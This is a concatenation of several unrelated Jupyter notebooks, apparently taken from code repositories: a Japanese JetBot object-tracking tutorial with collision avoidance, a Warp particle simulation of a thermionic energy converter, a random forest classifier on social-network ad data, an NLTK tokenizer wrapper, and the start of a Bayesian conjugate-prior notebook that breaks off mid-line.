widgets.FloatSlider(value=0.0, min=0.0, max=1.0, description='speed') turn_gain_widget = widgets.FloatSlider(value=0.8, min=0.0, max=2.0, description='turn gain') ######################################## # ウィジェットの画像サイズを取得しておきます。 ######################################## width = int(image_widget.width) height = int(image_widget.height) ######################################## # 描画する文字のサイズを自動調整します。 ######################################## fontScale = height/1000.0 if fontScale < 0.4: fontScale = 0.4 fontThickness = 1 + int(fontScale) fontFace = cv2.FONT_HERSHEY_SIMPLEX ######################################## # カメラ画像の中央を原点とした、 # 検出した追跡対象の中央座標(center_x, center_y)を取得します。 ######################################## def detection_center(detection): bbox = detection['bbox'] center_x = (bbox[0] + bbox[2]) / 2.0 - 0.5 center_y = (bbox[1] + bbox[3]) / 2.0 - 0.5 return (center_x, center_y) ######################################## # カメラ画像の中央と追跡対象の中央までの距離を取得します。 ######################################## def norm(vec): return np.sqrt(vec[0]**2 + vec[1]**2) ######################################## # 複数の追跡対象ターゲットのうち、もっとも画面中央に映っているターゲットを取得します。 ######################################## def closest_detection(detections): closest_detection = None for det in detections: center = detection_center(det) if closest_detection is None: closest_detection = det elif norm(detection_center(det)) < norm(detection_center(closest_detection)): closest_detection = det return closest_detection ######################################## # カメラ画像が更新されたときに実行する処理を定義します。 ######################################## def execute(change): # カメラ画像を変数imageにコピーします。 image = change['new'] #################### # 衝突回避モデルを実行して、「blocked」かどうかを判断します。 #################### # 推論を実行します。 collision_output = collision_model(preprocess(image)) # collision_output.flatten()を呼び出すことで可能な限り不要な次元を除去します。([[blocked_rate, free_rate]]を[blocked_rate, free_rate]に変換) # softmax()関数を適用して出力ベクトルの合計が1になるように正規化します(これにより確率分布になります) # 入力データは多次元のバッチ配列になっています。出力もそれに対応しているためcollision_output.flatten()は多次元配列になっています。 # そのうえで、「blocked」の確率となるcollision_output.flatten()[0]の値を取得します。「free」の確率を取得する場合はcollision_output.flatten()[1]になります。 prob_blocked = float(F.softmax(collision_output.flatten(), dim=0)[0]) # 「blocked」の確率をスライダーに反映します。 blocked_widget.value = prob_blocked #################### # 「blocked」の確率が50%未満なら直進します。 # 画像表示ウィジェットを更新します。 # この関数の処理をここで終了します。 #################### if prob_blocked > 0.5: robot.left(0.3) image_widget.value = bgr8_to_jpeg(image) return #################### # 「blocked」の確率が50%以下なら、つまり「free」なら物体検出を実行します。 #################### # 物体検出モデルの実行コード内でBGR->RGB変換をおこなっているため、 # ここではOpenCVカメラ画像のBGRフォーマットのまま渡します。 detections = model(image) # 検出した物体の情報を表示します。 display_str = [] display_str.append("detection info") for det in detections[0]: # 検出した物体を一つ一つ解析します。 if det['label'] == 0: # 検出結果のうち、ラベル番号0は背景のためスキップします。 # background. skip continue if det['confidence'] <= 0.2: # スコアが低い場合。ここでは確認のために検出したものとしてpassします。 # bad score. skip #continue pass bbox = det['bbox'] # 検出した物体の範囲を表す長方形のx,y座標を取得します。 score = det['confidence'] # 検出した物体のスコア(確率)を取得します。 label = det['label'] # 検出した物体のラベル番号を取得します。 cv2.rectangle(image, (int(width * bbox[0]), int(height * bbox[1])), (int(width * bbox[2]), int(height * bbox[3])), (255, 0, 0), 2) # 検出した物体を青色の長方形で囲みます。 display_str.append("label:{} score:{:.2f}".format(label_widget.options[int(label)-1], score)) # ラベル名とスコアを文字列の配列に追加します。 #cv2.putText(image, display_str, org=(10, 20+20*num_detection), fontFace=fontFace, fontScale=fontScale, thickness=fontThickness, color=(77, 255, 9)) #################### # 検出した物体のラベル名とスコアを画像に描画します。 # 描画位置やパディングは画像サイズと文字数から、見やすくなるように計算して描画します。 #################### max_text_width = 0 max_text_height = 0 if len(display_str) > 0: [(text_width, text_height), baseLine] = cv2.getTextSize(text=display_str[0], fontFace=fontFace, fontScale=fontScale, thickness=fontThickness) x_left = int(baseLine) y_top = int(baseLine) for i in range(len(display_str)): [(text_width, text_height), baseLine] = cv2.getTextSize(text=display_str[i], fontFace=fontFace, fontScale=fontScale, thickness=fontThickness) if max_text_width < text_width: max_text_width = text_width if max_text_height < text_height: max_text_height = text_height for i in range(len(display_str)): cv2.putText(image, display_str[i], org=(x_left, y_top + int(max_text_height*1.2 + (max_text_height*1.2 * i))), fontFace=fontFace, fontScale=fontScale, thickness=fontThickness, color=(77, 255, 9)) #################### # 検出した物体が追跡対象のラベルと一致している場合、その情報を取得します。 # ラベル番号は、物体検出の結果は0が背景、1が「person」ラベルになります。 # ラベル選択ウィジェットのドロップダウンリストの配列は背景を選択しないようにしているため、 # 0が「person」ラベルになります。そのため、ラベル選択ウィジェットのインデックスに+1したものが物体検出のラベル番号と一致することになります。 #################### matching_detections = [d for d in detections[0] if d['label'] == int(label_widget.index)+1] #################### # 追跡対象の物体のうち、画面中央にもっとも近い物体を追跡対象とします。 #################### target = closest_detection(matching_detections) #################### # 追跡対象となる物体が存在する場合は、物体を緑色の長方形で囲みます。 #################### if target is not None: bbox = target['bbox'] cv2.rectangle(image, (int(width * bbox[0]), int(height * bbox[1])), (int(width * bbox[2]), int(height * bbox[3])), (0, 255, 0), 5) #################### # 追跡対象となる物体が存在しない場合は、衝突回避の「free」と同じように前進します。 #################### if target is None: robot.forward(float(speed_widget.value)) #################### # 追跡対象となる物体が存在する場合は、物体の中心方向を向くようにモーターを制御します。 #################### else: center = detection_center(target) robot.set_motors( float(speed_widget.value + turn_gain_widget.value * center[0]), float(speed_widget.value - turn_gain_widget.value * center[0]) ) #################### # 画像表示ウィジェットを更新します。 #################### image_widget.value = bgr8_to_jpeg(image) ###Output _____no_output_____ ###Markdown モデル推論からJetBotの動作までを実行する関数を作成しました。 今度はそれをカメラ画像の更新に連動して動作させる必要があります。JetBotでは、traitlets.HasTraitsを継承したCameraクラスを実装しているので、observe()を呼び出すだけで実現できます。 JetBotを動かしてみよう次のコードで``start jetbot``ボタンと``stop jetbot``ボタンを作成します。 ``start jetbot``ボタンを押すとモデルの初期化が実行され、JetBotが動作し始めます。 ``stop jetbot``ボタンを押すとJetBotが停止します。 最初の1フレームの実行時にメモリの初期化が実行されるので、ディープラーニングではどんなモデルも最初の1フレームの処理はすこし時間がかかります。 ###Code ######################################## # 利用するライブラリを読み込みます。 ######################################## import ipywidgets import time ######################################## # スタートボタンとストップボタンを作成します。 ######################################## model_start_button = ipywidgets.Button(description='start jetbot') model_stop_button = ipywidgets.Button(description='stop jetbot') ######################################## # スタートボタンがクリックされた時に呼び出す関数を定義します。 ######################################## def start_model(c): execute({'new': camera.value}) # execute()関数を1回呼び出して初期化します。 camera.observe(execute, names='value') # Cameraクラスのtraitlets.Any()型のvalue変数(カメラ画像データ)が更新されたときに指定した関数を呼び出します。 model_start_button.on_click(start_model) # startボタンがクリックされた時に指定した関数を呼び出します。 ######################################## # ストップボタンがクリックされた時に呼び出す関数を定義します。 ######################################## def stop_model(c): camera.unobserve(execute, names='value') # カメラ画像データの更新と指定した関数の連動を解除します。 time.sleep(1) # 実行中の処理が完了するまで少し待ちます。 robot.stop() # モーターを停止します。 model_stop_button.on_click(stop_model) # stopボタンがクリックされた時に指定した関数を呼び出します。 ######################################## # ウィジェットの表示レイアウトを定義します。 ######################################## model_widget = ipywidgets.VBox([ image_widget, ipywidgets.HBox([label_widget, blocked_widget]), ipywidgets.HBox([speed_widget, turn_gain_widget]), ipywidgets.HBox([model_start_button, model_stop_button]) ]) ######################################## # ウィジェットを表示します。 ######################################## display(model_widget) ###Output _____no_output_____ ###Markdown うごいた! ターゲットが検出されると緑色のボックスが表示され、ターゲット以外の検出された物体は青色のボックスで表示されます。 衝突回避モデルによって「blocked(旋回する)」と判断された時、JetBotは左に曲がります。 衝突回避モデルによって「free(直進する)」と判断された時、ターゲットを検出している場合はJetBotはターゲットを追跡するように動作します。 衝突回避モデルによって「free(直進する)」と判断された時、ターゲットを検出していない場合は衝突回避モデルと同様に直進します。 カメラの停止最後に、他のノートブックでカメラを使うために、このノートブックで使ったカメラを停止しておきます。 ###Code camera.stop() # カメラを停止します。 ###Output _____no_output_____
examples/thermionic_energy_convertors/Enhanced_Warp_Thermionic_Converter.ipynb
###Markdown Enhanced features for a Simple Warp Interface for Thermionic Converters**5/10/2017**This version of the original "Develop_Warp_Thermionic_Converter" notebook includes additional features for improving the GUI for electrostatic simulations.These improvements include specific features for the simulation control palette in the visualization tab of the GUI:1. Isolated code to quickly compute a converged electric potential for the user-defined grid2. A script to computed an estimated "expected" time of flight for an electron across the gap.5/10/2017Nathan Cook ###Code %matplotlib inline %load_ext autoreload %autoreload 2 from __future__ import division import sys del sys.argv[1:] # Necessry to run 'from warp import *' in IPython notebook without conflict. from warp import * import numpy as np import matplotlib.pyplot as plt import os import pickle import h5py from re import findall from scipy.special import erfinv from datetime import datetime import rswarp from warp.data_dumping.openpmd_diag import ParticleDiagnostic from rswarp.diagnostics import FieldDiagnostic from rswarp.utilities.file_utils import cleanupPrevious from rswarp.utilities.file_utils import readparticles from rswarp.utilities.file_utils import loadparticlefiles from rswarp.cathode import sources from rswarp.cathode import injectors # Constants imports from scipy.constants import e, m_e, c, k kb_eV = 8.6173324e-5 #Bolztmann constant in eV/K kb_J = k #Boltzmann constant in J/K m = m_e ###Output # Warp # Origin date: Thu, 27 Apr 2017 22:31:05 +0000 # Local date: Thu, 27 Apr 2017 22:31:05 +0000 # Commit hash: 8d81829 # /Users/ncook/.virtualenvs/rswarp_env/lib/python2.7/site-packages/warp/warp.pyc # /Users/ncook/.virtualenvs/rswarp_env/lib/python2.7/site-packages/warp/warpC.so # Thu May 11 00:14:15 2017 # import warp time 0.246575117111 seconds # For more help, type warphelp() ###Markdown Diagnostics ###Code diagDir = 'diags/xzsolver/hdf5/' field_base_path = 'diags/fields/' diagFDir = {'magnetic':'diags/fields/magnetic','electric':'diags/fields/electric'} # Cleanup previous files cleanupPrevious(diagDir,diagFDir) ###Output _____no_output_____ ###Markdown Grid parametersThe grid parameters comprise one of the primary sets of user inputs, and are required for initializing the grid, pre-calculating fundamental currents, and generating the solver. These values are also used throuhgout visualization scripts.**'Physical' Grid Parameters. These are physically intuitive values for a simple domain specification:**1. `PLATE_SPACING` - The longitudinal distance (z-axis) between cathode and anode2. `CHANNEL_WIDTH` - The transverse dimension of the simulation domain**Technical Grid Parameters. These provide the required inputs for constructing simulation objects, but may be computed from the physical parameters above for a simple rectangular geometry:**1. `X_MIN, X_MAX` - By default, horizontal domain is `(-0.5*CHANNEL_WIDTH,0.5*CHANNEL_WIDTH)`2. `X_MIN, X_MAX` - By default, longitudinal domian is `[0, PLATE_SPACING]`3. `Y_MIN, Y_MAX` - The ignorable plane, but specified for completeness. Defaults to +/- `(-0.5*CHANNEL_WIDTH,0.5*CHANNEL_WIDTH)`4. `NUM_X` - The number of grid points along x.5. `NUM_Y` - The number of grid points along y (ignorable for 2DXZ geometry).6. `NUM_Z` - The number of grid points along z. ###Code #GLOBAL GEOMETRY PARAMETERS FOR USERS PLATE_SPACING = 10e-6 #plate spacing CHANNEL_WIDTH = 110e-9 #width of simulation box #Dimensions X_MAX = CHANNEL_WIDTH*0.5 X_MIN = -1.*X_MAX Y_MAX = CHANNEL_WIDTH*0.5 Y_MIN = -1.*Y_MAX Z_MIN = 0. Z_MAX = PLATE_SPACING #Grid parameters NUM_X = 11 NUM_Y = 64 NUM_Z = 512 #z step size dz = (Z_MAX - Z_MIN)/NUM_Z ###Output _____no_output_____ ###Markdown Solver Geometry and BoundariesThe solver geometry is a fundemental pre-requisite for any interface or simulation setup. We will assume for now that we are fixing a 2D X-Z geometry, with the Y axis as an ignorable plane. **`w3d.solvergeom = w3d.XZgeom`**Future extensions to the interface will support 3D geometries. Where applicable and simple, small code snippets have been included in anticipation of this feature. However by no means are these scripts fully compliant with 3D simulations. ###Code #Specify solver geometry w3d.solvergeom = w3d.XZgeom assert w3d.solvergeom == w3d.XZgeom, \ 'Solver geometry required to be w3d.XZgeom' # Set boundary conditions # Longitudinal conditions overriden by conducting plates w3d.bound0 = neumann w3d.boundnz = dirichlet w3d.boundxy = periodic # Particles boundary conditions top.pbound0 = absorb top.pboundnz = absorb top.pboundxy = periodic # Set grid boundaries w3d.xmmin = X_MIN w3d.xmmax = X_MAX w3d.zmmin = 0. w3d.zmmax = Z_MAX # Set grid counts w3d.nx = NUM_X w3d.nz = NUM_Z zmesh = np.linspace(0,Z_MAX,NUM_Z+1) #holds the z-axis grid points in an array ###Output _____no_output_____ ###Markdown Source parameterizationThis section covers source parameterization, in particular how the electrons are emitted from the cathode. Warp permits several options. We want to support three options. For simplicity, I've defined the `USER_INJECT` flag which corresponds to the three possible options:1. Constant emission - user specifies current. `USER_INJECT = 1`2. Child-Langmuir emission (computed from geometries) - user selects and current is computed and displayed `USER_INJECT = 2`3. thermionic emission (computed from cathode temperature) - user selects and current is computed and displayed `USER_INJECT = 3`**Note that the following USER PARAMETERS are needed for the essential specification of the beam:**1. Instantiation via species command i.e. `beam = Species(type=Electron, name='beam')`2. beam radii in x,y via a0, b0 (`beam.a0 = 0.5*BEAM_WIDTH`). In many cases, `BEAM_WIDTH = CHANNEL_WIDTH`.3. beam current (`beam.ibeam = BEAM_CURRENT`)4. Cathode temperature in Kelvin (`CATHODE_TEMP`). Should default to 4K.5. Minimum z-coordinate for injected particles (`Z_PART_MIN`). Must have `Z_PART_MIN > Z_MIN`.**The next set of parameters are generated from additional user parameters (grid, beam, etc.):**1. The injection type for the instance of `top` (`top.inejct = 6`). This will be set to 6 (user injection) for most cases, determined by the `USER_INJECT` switch.2. Number of particles to be injected per step (`top.npinject`). This is computed from grid parameters and defaults to 10 particles per horizontal cell(e.g. `10*NUM_X`).2. Injection coordinate determination - analytical vs. interpolated (`w3d.l_inj_exact`). Defaults to false for most injection types.3. Variance of thermal particle velocity distribution in z (`beam.vthz`). Defaults to 0.4. Variance of thermal particle velocity distribution in transverse plane (`beam.vthperp`). Defaults to 0.The `rswarp` repository has been updated with a cathode module to streamline the designation of cathode sources via each of these three methods. Below we will demonstrate their use and provide a simple template. ###Code #Cathode and anode settings CATHODE_TEMP = 1273.15 #1100. #1273.15 #1000. #cathode temperature in K CATHODE_PHI = 2.0 #work function in eV ANODE_WF = 0.1 GRID_BIAS = 0.4 #voltage applied to any grid of electrodes vacuum_level = CATHODE_PHI - ANODE_WF + GRID_BIAS #compute beam cutoff velocity for time-step determinance beam_beta = sources.compute_cutoff_beta(CATHODE_TEMP) #Compute Child-Langmuir limit for this setup A/m^2 cl_limit = sources.cl_limit(CATHODE_PHI, ANODE_WF, GRID_BIAS, PLATE_SPACING) #INJECTION SPECIFICATION USER_INJECT = 1 # --- Setup simulation species beam = Species(type=Electron, name='beam') # --- Set basic beam parameters SOURCE_RADIUS_1 = 0.5*CHANNEL_WIDTH #a0 parameter - X plane SOURCE_RADIUS_2 = 0.5*CHANNEL_WIDTH #b0 parameter - Y plane Z_PART_MIN = dz/8. #starting particle z value #Compute cathode area for geomtry-specific current calculations if (w3d.solvergeom == w3d.XYZgeom): #For 3D cartesion geometry only cathode_area = 4.*SOURCE_RADIUS_1*SOURCE_RADIUS_2 else: #Assume 2D XZ geometry cathode_area = 2.*SOURCE_RADIUS_1*1. # 1 m is the geometric factor scaling the plane of the ignorable coordinate #Set a default 'USER_CURRENT' to the Richardson-Dushman current in case of user-specified constant emission #This will ultimately be an adjustable GUI parameter. USER_CURRENT = cl_limit*cathode_area #sources.j_rd(CATHODE_TEMP,CATHODE_PHI)*cathode_area # If true, position and angle of injected particle are computed analytically rather than interpolated # Can be false for all but C-L injection (inject=2) w3d.l_inj_exact = False #Specify particles to be injected each step - 10 macro-particles per cell by default, USER SPECIFIED IN FUTURE PTCL_PER_STEP = 10*NUM_X top.npinject = PTCL_PER_STEP # --- If using the XZ geometry, set so injection uses the same geometry top.linj_rectangle = (w3d.solvergeom == w3d.XZgeom) #Determine an appropriate time step based upon estimated final velocity vzfinal = sqrt(2.*abs(vacuum_level)*np.abs(beam.charge)/beam.mass)+beam_beta*c dt = dz/vzfinal #5e-15 top.dt = dt if vzfinal*top.dt > dz: print "Time step dt = {:.3e}s does not constrain motion to a single cell".format(top.dt) if USER_INJECT == 1: # Constant current density - beam transverse velocity fixed to zero, very small longitduinal velocity #Set injection flag top.inject = 6 # 1 means constant; 2 means space-charge limited injection;# 6 means user-specified beam.ibeam = USER_CURRENT beam.a0 = SOURCE_RADIUS_1 beam.b0 = SOURCE_RADIUS_2 #sources.constant_current(beam, CHANNEL_WIDTH, Z_PART_MIN, ptcl_per_step) myInjector = injectors.injectorUserDefined(beam, CATHODE_TEMP, CHANNEL_WIDTH, Z_PART_MIN, PTCL_PER_STEP) installuserinjection(myInjector.inject_constant) if USER_INJECT == 2: # space charge limited injection using Child-Langmuir computation of cold limit #Set injection flag top.inject = 2 # 1 means constant; 2 means space-charge limited injection;# 6 means user-specified beam_current = sources.cl_limit(CATHODE_PHI, ANODE_WF, GRID_BIAS, PLATE_SPACING)*cathode_area beam.ibeam = beam_current beam.a0 = SOURCE_RADIUS_1 beam.b0 = SOURCE_RADIUS_2 w3d.l_inj_exact = True elif USER_INJECT == 3: #Thermionic injection #Set injection flag top.inject = 6 # 1 means constant; 2 means space-charge limited injection;# 6 means user-specified beam_current = sources.j_rd(CATHODE_TEMP,CATHODE_PHI)*cathode_area #steady state current in Amps beam.ibeam = beam_current beam.a0 = SOURCE_RADIUS_1 beam.b0 = SOURCE_RADIUS_2 myInjector = injectors.injectorUserDefined(beam, CATHODE_TEMP, CHANNEL_WIDTH, Z_PART_MIN, PTCL_PER_STEP) installuserinjection(myInjector.inject_thermionic) # These must be set for user injection top.ainject = 1.0 top.binject = 1.0 derivqty() ###Output _____no_output_____ ###Markdown Create solver ###Code # Set up fieldsolver f3d.mgtol = 1e-6 # Multigrid solver convergence tolerance, in volts. 1 uV is default in Warp. solverE = MultiGrid2D() registersolver(solverE) ###Output _____no_output_____ ###Markdown Install conductors ###Code # --- Emitter settings extractor_voltage = vacuum_level # --- Anode Location zplate = Z_MAX#1e-6 # --- plate location # Create source conductors source = ZPlane(zcent=w3d.zmmin,zsign=-1.,voltage=0.) installconductor(source, dfill=largepos) # Create ground plate plate = ZPlane(voltage=extractor_voltage, zcent=zplate) installconductor(plate,dfill=largepos) # Setup the particle scraper scraper = ParticleScraper([source, plate]) ###Output _____no_output_____ ###Markdown Define diagnostics ###Code particleperiod = 100 particle_diagnostic_0 = ParticleDiagnostic(period = particleperiod, top = top, w3d = w3d, species = {species.name: species for species in listofallspecies}, comm_world=comm_world, lparallel_output=False, write_dir = diagDir[:-5]) fieldperiod = 100 efield_diagnostic_0 = FieldDiagnostic.ElectrostaticFields(solver=solverE, top=top, w3d=w3d, comm_world = comm_world, period=fieldperiod) installafterstep(particle_diagnostic_0.write) installafterstep(efield_diagnostic_0.write) ###Output _____no_output_____ ###Markdown UPDATED - Generate simulation package and plot potentialThis call has been updated to allow for plotting of the electrostatic potential. Rather than calling generate with its default parameters, the `mgmaxiters` parameter is set to a large value (11000) to allow the initial solve called by generate to produce a potential that has converged to the geometry. After the `generate()` is finished, the parameter is reset to its default of 100. ###Code #prevent GIST from starting upon setup top.lprntpara = false top.lpsplots = false top.verbosity = 0 # Reduce solver verbosity solverE.mgverbose = 0 #further reduce output upon stepping - prevents websocket timeouts in Jupyter notebook #Adjusting the multigrid parameter here improves convergence speed omega = 2./(1. + np.sin(np.pi/min(NUM_X+1,NUM_Z+1))) solverE.mgparam = omega solverE.mgmaxiters = 12000 #rough approximation needed for initial solve to converge package("w3d") generate() solverE.mgmaxiters = 100 ###Output *** particle simulation package W3D generating --- Resetting lattice array sizes --- Allocating space for particles --- Loading particles --- Setting charge density --- done --- Allocating Win_Moments --- Allocating Z_Moments --- Allocating Lab_Moments Multigrid2d: Max. # of iterations reached Multigrid2d: Error converged to 6.663E-06 in 12000 v-cycles ###Markdown UPDATED - Now plot the potential ###Code #Need to compute the potential first potential = solverE.getphi() #Now plot fig = plt.figure(figsize=(12,6)) X_CELLS = NUM_X Z_CELLS = NUM_Z potential = solverE.getphi() xl = 0 xu = NUM_X zl = 0 zu = NUM_Z midpoint = 1 - np.max(potential[xl:xu,zl:zu])/(np.max(potential[xl:xu,zl:zu]) + abs(np.min(potential[xl:xu,zl:zu]))) plt.xlabel("z ($\mu$m)") plt.ylabel("x ($\mu$m)") plt.title("$\phi$ Across Whole Domain") pxmin = ((X_MAX - X_MIN) / X_CELLS * xl + X_MIN) * 1e6 pxmax = ((X_MAX - X_MIN) / X_CELLS * xu + X_MIN) * 1e6 pzmin = (Z_MIN + zl / Z_CELLS * Z_MAX) * 1e6 pzmax = (Z_MAX * zu / Z_CELLS) * 1e6 plt.xlim(pzmin, pzmax) plt.ylim(pxmin, pxmax) phi_plt = plt.imshow(potential[xl:xu,zl:zu],cmap='viridis',extent=[pzmin, pzmax, pxmin, pxmax],aspect='auto') cbar = fig.colorbar(phi_plt) cbar.ax.set_xlabel("Volts") cbar.ax.xaxis.set_label_position('top') #plt.show() ###Output _____no_output_____ ###Markdown Estimate the time of flight for an electron crossing the gapWe will estimate the average time of flight for a particle by averaging over the x-plane of the electric field, then integrating the particle motion in that averaged electric field. For our simulation particle we will take an electron with the expected velocity based on a thermal distribution with the cathode temperature.**Note that this requires importing the interp1d function from scipy.interpolate** ###Code from scipy.interpolate import interp1d as scipy_interp1d #Grab Ez from the solver and average over the transverse (x) plane Ez = solverE.getez() flat_Ez = numpy.mean(Ez,0) #Generate an interpolating function for smooth particle integration Ez_approx = scipy_interp1d(zmesh,flat_Ez, kind='cubic') #Integrate the particle motion subject to initial conditions specified by the simulation tof_expected = sources.compute_expected_time(beam, CATHODE_TEMP, Ez_approx, Z_MIN, Z_MAX, top.dt) print "Expected time of flight is {}s".format(tof_expected) print "This corresponds to {} steps".format(tof_expected/top.dt) ###Output Expected time of flight is 1.95578558527e-11s This corresponds to 1259.0 steps ###Markdown Run simulation ###Code #%%time num_steps = 5000 output_steps = np.linspace(0,num_steps,num_steps/particleperiod + 1)[1:] step_count = 0 time0 = time.time() step(num_steps) time1 = time.time() time_per_step = (time1-time0)/num_steps ###Output *** particle simulation package W3D running ###Markdown Some basic diagnosticsA few diagnostics for testing. Specifically, we look at the current across the gap at the end of the simulation to verify that it's uniform at the value expected. ###Code efield_path = diagFDir['electric'] efield_files = [os.path.join(efield_path,fn) for fn in os.listdir(efield_path)] efield_files.sort() fielddata_file = efield_files[-1] step_number = int(findall(r'\d+', fielddata_file)[0]) data_efield = h5py.File(fielddata_file, 'r') Ex = data_efield['data/%s/meshes/E/x' % (step_number)] Ey = data_efield['data/%s/meshes/E/y' % (step_number)] Ez = data_efield['data/%s/meshes/E/z' % (step_number)] phi = data_efield['data/%s/meshes/phi'% (step_number)] particles_path = diagDir particles_files = [os.path.join(particles_path,fn) for fn in os.listdir(particles_path)] particles_files.sort() particledata_file = particles_files[-1] # Read single particle diagnostic file in f0 = readparticles(particledata_file.format(num_steps)) # Read all particles into directory. Structure: name[int stepnumber][str Species name] fall = loadparticlefiles(particles_path) def get_zcurrent_new(particle_array, momenta, mesh, particle_weight, dz): """ Find z-directed current on a per cell basis particle_array: z positions at a given step momenta: particle momenta at a given step in SI units mesh: Array of Mesh spacings particle_weight: Weight from Warp dz: Cell Size """ charge = 1.60217662e-19 mass = 9.10938356e-31 current = np.zeros_like(mesh) velocity = c * momenta / np.sqrt(momenta**2 + (mass * c)**2) for index, zval in enumerate(particle_array): bucket = np.round(zval/dz) #value of the bucket/index in the current array current[int(bucket)] += velocity[index] return current* charge * particle_weight / dz # Get current for all steps (takes a long time) current_history = [] for i in range(particleperiod,num_steps,particleperiod): #print i curr = get_zcurrent_new(fall[i]['beam'][:,4],fall[i]['beam'][:,5],zmesh,beam.sw,dz) current_history.append(curr) current_history = np.asarray(current_history) #Plot the current across gap at a single time fig5 = plt.figure(figsize=(16,6)) #scalings h_scale = 1.e6 y_range_max = beam.ibeam*1.e3*1.2 #current plotted from grid plt.plot(zmesh*h_scale,np.array(current_history[-1])*1e3,'k') #Compute and plot idealized currents as needed RD_ideal = np.ones(len(zmesh))*sources.j_rd(CATHODE_TEMP,CATHODE_PHI)*cathode_area JCL_ideal = np.ones(len(zmesh))*cl_limit*cathode_area if (RD_ideal[0]*1e3 <= y_range_max): plt.plot(zmesh*h_scale,RD_ideal*1.e3,'r--',label=r'Richardson-Dushman') if (JCL_ideal[0]*1e3 <= y_range_max): plt.plot(zmesh*h_scale,JCL_ideal*1.e3,'b--',label=r'I$_{cl}$ cold limit') #labels and legends plt.xlabel("z ($\mu$m)",fontsize='16') plt.ylabel("current (mA)",fontsize='16') plt.title("Current - {:.4E}s".format(fall[num_steps]['time']),fontsize=18) plt.xlim(Z_MIN,Z_MAX*1.e6) plt.ylim(0, y_range_max) plt.legend(loc=4) title = 'current_{:.4f}ps-test.pdf'.format(CATHODE_TEMP,fall[num_steps]['time']*1.e9) #fig5.savefig(title,bbox_inches='tight') ###Output _____no_output_____
RandomForest_Classifier.ipynb
###Markdown Importing data ###Code data=pd.read_csv('Social_Network_Ads.csv') print(data.head()) data.describe() ###Output _____no_output_____ ###Markdown Checking null values ###Code data.isnull().sum() ###Output _____no_output_____ ###Markdown Splitting data ###Code from sklearn.model_selection import train_test_split x=data.iloc[:,:-1].values y=data.iloc[:,-1].values.reshape(-1,1) x_train,x_test,y_train,y_test=train_test_split(x,y,test_size=0.25,random_state=0) ###Output _____no_output_____ ###Markdown Feature Scaling ###Code from sklearn.preprocessing import StandardScaler sc=StandardScaler() x_train=sc.fit_transform(x_train) x_test=sc.transform(x_test) ###Output _____no_output_____ ###Markdown Model Build and Train ###Code from sklearn.ensemble import RandomForestClassifier rmc=RandomForestClassifier(n_estimators=100,criterion='entropy',random_state=0) rmc.fit(x_train,y_train) rmc.score(x_train,y_train) ###Output _____no_output_____ ###Markdown prediction using model ###Code y_pred=rmc.predict(x_test).reshape(-1,1) print(np.concatenate((y_test,y_pred),axis=1)) ###Output [[0 0] [0 0] [0 0] [0 0] [0 0] [0 0] [0 0] [1 1] [0 0] [0 1] [0 0] [0 0] [0 0] [0 0] [0 0] [0 1] [0 1] [0 0] [1 1] [0 0] [0 0] [1 1] [0 0] [1 1] [0 0] [1 0] [0 0] [0 0] [0 0] [0 0] [0 0] [1 0] [1 1] [0 0] [0 0] [0 0] [0 0] [0 0] [0 0] [1 1] [0 0] [0 0] [0 0] [0 0] [1 1] [0 0] [0 0] [1 1] [0 0] [1 1] [1 1] [0 0] [0 0] [0 0] [1 1] [1 1] [0 0] [0 0] [1 1] [0 0] [0 0] [1 1] [0 0] [1 1] [0 0] [1 1] [0 0] [0 0] [0 0] [0 1] [1 1] [0 0] [0 0] [1 1] [0 0] [0 0] [0 0] [0 0] [1 1] [1 1] [1 1] [0 1] [0 0] [0 0] [1 1] [1 0] [0 0] [1 1] [1 1] [0 0] [0 0] [1 1] [0 0] [0 0] [0 0] [1 0] [0 0] [1 1] [1 1] [1 1]] ###Markdown Model Accuracy ###Code from sklearn.metrics import accuracy_score accuracy_score(y_test,y_pred) ###Output _____no_output_____ ###Markdown Confusion Matrix ###Code from sklearn.metrics import confusion_matrix confusion_matrix(y_test,y_pred) ###Output _____no_output_____
tomef/tokenizer/pt_tokenizer.py.ipynb
###Markdown PT Tokenizer ← ↑This is a wrapper around the Penn Treebank tokenizer provided by the NLTK.For more information see https://www.nltk.org/api/nltk.tokenize.html--- Setup and Settings--- ###Code from __init__ import init_vars init_vars(vars()) import nltk try: nltk.data.find('tokenizers/punkt') except LookupError: nltk.download('punkt') from nltk.tokenize import word_tokenize import tokenizer.common from tokenizer.token_util import TokenizerBase ###Output _____no_output_____ ###Markdown --- Build PTTokenizer class--- ###Code class PTTokenizer(TokenizerBase): def tokenize(self, text, *args): text = text.replace(tokenizer.common.separator_token,tokenizer.common.separator_token_replacement) return word_tokenize(text) ###Output _____no_output_____
10_bayesian_machine_learning/01_updating_conjugate_priors.ipynb
###Markdown Bayesian Updating with Conjugate Priors When the data consists of binary Bernoulli random variables with a certain success probability for a positive outcome, the number of successes in repeated trials follows a Binomial distribution. The conjugate prior is the Beta distribution with support over the interval [0, 1] and two shape parameters to model arbitrary prior distributions over the success probability. Hence, the posterior distribution is also a Beta distribution that we can derive by directly updating the parameters. Setup ###Code import warnings warnings.filterwarnings('ignore') %matplotlib inline import numpy as np import pandas as pd from matplotlib import pyplot as plt import seaborn as sns import scipy.stats as stats from matplotlib.ticker import FuncFormatter import matplotlib as mpl mpl.rcParams['text.usetex'] = True mpl.rcParams['text.latex.preamble'] = [r'\usepackage{amsmath}'] np.random.seed(42) sns.set_style('dark') ###Output _____no_output_____ ###Markdown Formatting Helper ###Code def format_plot(axes, i, p, y, trials, success, true_p, tmle, tmap=None): fmt = FuncFormatter(lambda x, _: f'{x:.0%}') if i >= 6: axes[i].set_xlabel("$p$, Success Probability") axes[i].xaxis.set_major_formatter(fmt) else: axes[i].axes.get_xaxis().set_visible(False) if i % 3 == 0: axes[i].set_ylabel("Posterior Probability") axes[i].set_yticks([], []) axes[i].plot(p, y, lw=1, c='k') axes[i].fill_between(p, y, color='darkblue', alpha=0.4) axes[i].vlines(true_p, 0, max(10, np.max(y)), color='k', linestyle='--', lw=1) axes[i].set_title(f'Trials: {trials:,d} - Success: {success:,d}') if i > 0: smle = r"$\theta_{{\mathrm{{MLE}}}}$ = {:.2%}".format(tmle) axes[i].text(x=.02, y=.85, s=smle, transform=axes[i].transAxes) smap = r"$\theta_{{\mathrm{{MAP}}}}$ = {:.2%}".format(tmap) axes[i].text(x=.02, y=.75, s=smap, transform=axes[i].transAxes) return axes[i] ###Output _____no_output_____ ###Markdown Simulate Coin Tosses & Updates of Posterior ###Code n_trials = [0, 1, 3, 5, 10, 25, 50, 100, 500] outcomes = stats.bernoulli.rvs(p=0.5, size=n_trials[-1]) p = 